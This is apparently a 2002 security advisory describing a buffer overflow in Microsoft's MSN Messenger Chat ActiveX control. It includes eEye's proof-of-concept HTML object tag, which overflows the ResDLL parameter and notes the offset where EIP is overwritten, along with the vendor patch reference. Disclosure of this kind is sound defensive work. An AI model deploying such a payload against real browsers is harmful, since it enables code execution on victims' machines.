Unchecked Buffer in Microsoft MSN Messenger Chat ActiveX Control

Reported May 8, 2002, by eEye Digital Security.

 

VERSION AFFECTED

·         Microsoft MSN Messenger ActiveX Chat Control

 

 

DESCRIPTION
A buffer overflow condition exists in Microsoft’s MSN Messenger Chat control that can result in unauthorized code execution. Even if users haven't installed Messenger, an attacker can call the control from the codebase tag, which would prompt users to install the control with Microsoft's credentials, because Microsoft signs the OLE custom control (OCX). eEye’s advisory gives a detailed explanation on this vulnerability.

 

DEMONSTRATION

eEye Digital Security provided the following example as proof-of-concept:

 

<object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061" width="455"

height="523">

<param name="_cx" value="12039">

<param name="_cy" value="13838">

<param name="BackColor" value="50331647">

<param name="ForeColor" value="43594547">

<param name="RedirectURL" value="">

<param name="ResDLL" value="AAAAAAA\[27,257 bytes is where the EIP starts\]">

</object>

 

VENDOR RESPONSE

 

The vendor, Microsoft, has released Security Bulletin MS02-022 to address this vulnerability and recommends that affected users apply the appropriate patch listed in the bulletin.

 

CREDIT
Discovered by Drew Copley and eEye Digital Security.

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish